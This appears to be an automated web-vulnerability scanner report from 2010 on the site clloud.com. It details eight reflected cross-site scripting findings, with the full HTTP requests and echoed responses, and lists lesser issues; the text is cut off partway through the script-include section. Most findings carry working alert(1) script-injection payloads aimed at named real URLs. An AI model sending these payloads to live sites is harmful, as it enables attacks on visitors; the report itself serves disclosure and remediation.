clloud.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in clloud.com | Vulnerability Crawler Report

Report generated by XSS.CX at Tue Dec 28 11:28:42 CST 2010.


Contents


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://clloud.com/cloud-files-news/sites-using-cdn-file-clouds/ [name of an arbitrarily supplied request parameter]

1.2. http://clloud.com/feed/ [name of an arbitrarily supplied request parameter]

1.3. http://clloud.com/tag/amazon-s3/ [name of an arbitrarily supplied request parameter]

1.4. http://clloud.com/tag/cdn/ [name of an arbitrarily supplied request parameter]

1.5. http://clloud.com/tag/cloud-storage/ [name of an arbitrarily supplied request parameter]

1.6. http://clloud.com/tag/cloud/ [name of an arbitrarily supplied request parameter]

1.7. http://clloud.com/tag/rackspace-cloud/ [name of an arbitrarily supplied request parameter]

1.8. http://clloud.com/tag/storage-cloud/ [name of an arbitrarily supplied request parameter]

2. Cross-domain Referer leakage

3. Cross-domain script include

3.1. http://clloud.com/

3.2. http://clloud.com/

3.3. http://clloud.com/blog/

3.4. http://clloud.com/clloud-com-news/gigenet-cloud-servers-reviewed/

3.5. http://clloud.com/clloud-com-news/we-test-drive-the-rackspace-cloud-iphone-app/

3.6. http://clloud.com/cloud-files-news/new-rackspace-cloud-control-panel-coming-soon/

3.7. http://clloud.com/cloud-files-news/sites-using-cdn-file-clouds/

3.8. http://clloud.com/cloud-server-news/get-30-off-at-vps-net/

3.9. http://clloud.com/cloud-server-news/vps-net-now-offers-offsite-daily-rsync-backups/

3.10. http://clloud.com/cloud-server-news/vps-net-to-offer-windows-cloud-servers/

3.11. http://clloud.com/cloud-server-reviews/

3.12. http://clloud.com/cloud-server-reviews/gigenet-cloud-servers/

3.13. http://clloud.com/cloud-server-reviews/vps-net-cloud-servers/

3.14. http://clloud.com/feed/

3.15. http://clloud.com/general-cloud-news/microsoft-staking-its-future-on-cloud-computing/

3.16. http://clloud.com/general-cloud-news/send-vps-net-a-postcard-and-win-an-ipad/

3.17. http://clloud.com/reviews/

3.18. http://clloud.com/reviews/amazon-storage-cloud-amazon-s3/

3.19. http://clloud.com/reviews/cloudlayer-storage/

3.20. http://clloud.com/reviews/rackspace-cloud/

3.21. http://clloud.com/tag/amazon-s3-review/

3.22. http://clloud.com/tag/amazon-s3/

3.23. http://clloud.com/tag/amazon/

3.24. http://clloud.com/tag/cdn/

3.25. http://clloud.com/tag/cloud-server/

3.26. http://clloud.com/tag/cloud-servers/

3.27. http://clloud.com/tag/cloud-storage/

3.28. http://clloud.com/tag/cloud/

3.29. http://clloud.com/tag/cloudlayer/

3.30. http://clloud.com/tag/cname/

3.31. http://clloud.com/tag/control-panel/

3.32. http://clloud.com/tag/gigenet-review/

3.33. http://clloud.com/tag/gigenet/

3.34. http://clloud.com/tag/ipad/

3.35. http://clloud.com/tag/iphone/

3.36. http://clloud.com/tag/microsoft/

3.37. http://clloud.com/tag/rackspace-cloud/

3.38. http://clloud.com/tag/rackspace/

3.39. http://clloud.com/tag/softlayer/

3.40. http://clloud.com/tag/storage-cloud/

3.41. http://clloud.com/tag/vps-cloud/

3.42. http://clloud.com/tag/vps-net/

3.43. http://clloud.com/tag/win-an-ipad/

3.44. http://clloud.com/tag/windows/

3.45. http://clloud.com/tutorials-and-tips/midphase-hosting/

3.46. http://clloud.com/tutorials-and-tips/rackspace-cloud-upload-with-php-api-troubleshooting/

3.47. http://clloud.com/tutorials-and-tips/uploading-files-to-rackspace-cloud-using-php-aka-mosso/

4. TRACE method is enabled

5. Email addresses disclosed

5.1. http://clloud.com/wp-content/plugins/recaptcha-form/gd-recaptcha.css

5.2. http://clloud.com/wp-content/plugins/wp-recaptcha/recaptcha.css

6. Robots.txt file

7. HTML does not specify charset



1. Cross-site scripting (reflected)  next
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://clloud.com/cloud-files-news/sites-using-cdn-file-clouds/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-files-news/sites-using-cdn-file-clouds/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 282cd"><script>alert(1)</script>4614d3145f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 282cd\"><script>alert(1)</script>4614d3145f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cloud-files-news/sites-using-cdn-file-clouds/?282cd"><script>alert(1)</script>4614d3145f8=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:49:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=227>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/cloud-files-news/sites-using-cdn-file-clouds/?282cd\"><script>alert(1)</script>4614d3145f8=1">
...[SNIP]...

1.2. http://clloud.com/feed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clloud.com
Path:   /feed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload df966<a>6954775dfc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /feed/?df966<a>6954775dfc6=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:46:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
ETag: "b39fa4e273d59683550769edadaa2370"
Last-Modified: Tue, 02 Nov 2010 07:14:11 GMT
Connection: close
Content-Type: text/xml; charset=UTF-8
Content-Length: 34909

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...
<form method="post" action="/feed/?df966<a>6954775dfc6=1">
...[SNIP]...

1.3. http://clloud.com/tag/amazon-s3/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/amazon-s3/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c211c"><script>alert(1)</script>3fb7085f6c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c211c\"><script>alert(1)</script>3fb7085f6c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/amazon-s3/?c211c"><script>alert(1)</script>3fb7085f6c3=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/tag/amazon-s3/?c211c\"><script>alert(1)</script>3fb7085f6c3=1">
...[SNIP]...

1.4. http://clloud.com/tag/cdn/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cdn/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46313"><script>alert(1)</script>cef8a73b8a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46313\"><script>alert(1)</script>cef8a73b8a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/cdn/?46313"><script>alert(1)</script>cef8a73b8a9=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/tag/cdn/?46313\"><script>alert(1)</script>cef8a73b8a9=1">
...[SNIP]...

1.5. http://clloud.com/tag/cloud-storage/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cloud-storage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fb3"><script>alert(1)</script>db6e69ef8ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37fb3\"><script>alert(1)</script>db6e69ef8ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/cloud-storage/?37fb3"><script>alert(1)</script>db6e69ef8ca=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:52:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 69366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/tag/cloud-storage/?37fb3\"><script>alert(1)</script>db6e69ef8ca=1">
...[SNIP]...

1.6. http://clloud.com/tag/cloud/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/cloud/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83b16"><script>alert(1)</script>b38fd3ed88b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83b16\"><script>alert(1)</script>b38fd3ed88b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/cloud/?83b16"><script>alert(1)</script>b38fd3ed88b=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:51:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/tag/cloud/?83b16\"><script>alert(1)</script>b38fd3ed88b=1">
...[SNIP]...

1.7. http://clloud.com/tag/rackspace-cloud/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/rackspace-cloud/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac37b"><script>alert(1)</script>08e50f441fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac37b\"><script>alert(1)</script>08e50f441fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/rackspace-cloud/?ac37b"><script>alert(1)</script>08e50f441fc=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:54:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/tag/rackspace-cloud/?ac37b\"><script>alert(1)</script>08e50f441fc=1">
...[SNIP]...

1.8. http://clloud.com/tag/storage-cloud/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clloud.com
Path:   /tag/storage-cloud/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da0ec"><script>alert(1)</script>2ed263110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da0ec\"><script>alert(1)</script>2ed263110 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/storage-cloud/?da0ec"><script>alert(1)</script>2ed263110=1 HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:54:36 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method="post" action="/tag/storage-cloud/?da0ec\"><script>alert(1)</script>2ed263110=1">
...[SNIP]...

2. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /?xd_receiver=1 HTTP/1.1
Host: clloud.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=dede1b193bdee860c80cdc6ff6fbfdb2&extern=0&channel=http%3A%2F%2Fclloud.com%2F%3Fxd_receiver%3D1&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; __utmc=129154910; __utmb=129154910.1.10.1293553097

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:18:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

3. Cross-domain script include  previous  next
There are 47 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://clloud.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: clloud.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:18:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 18660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...

3.2. http://clloud.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?xd_receiver=1 HTTP/1.1
Host: clloud.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=dede1b193bdee860c80cdc6ff6fbfdb2&extern=0&channel=http%3A%2F%2Fclloud.com%2F%3Fxd_receiver%3D1&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; __utmc=129154910; __utmb=129154910.1.10.1293553097

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:18:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

3.3. http://clloud.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /blog/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19756

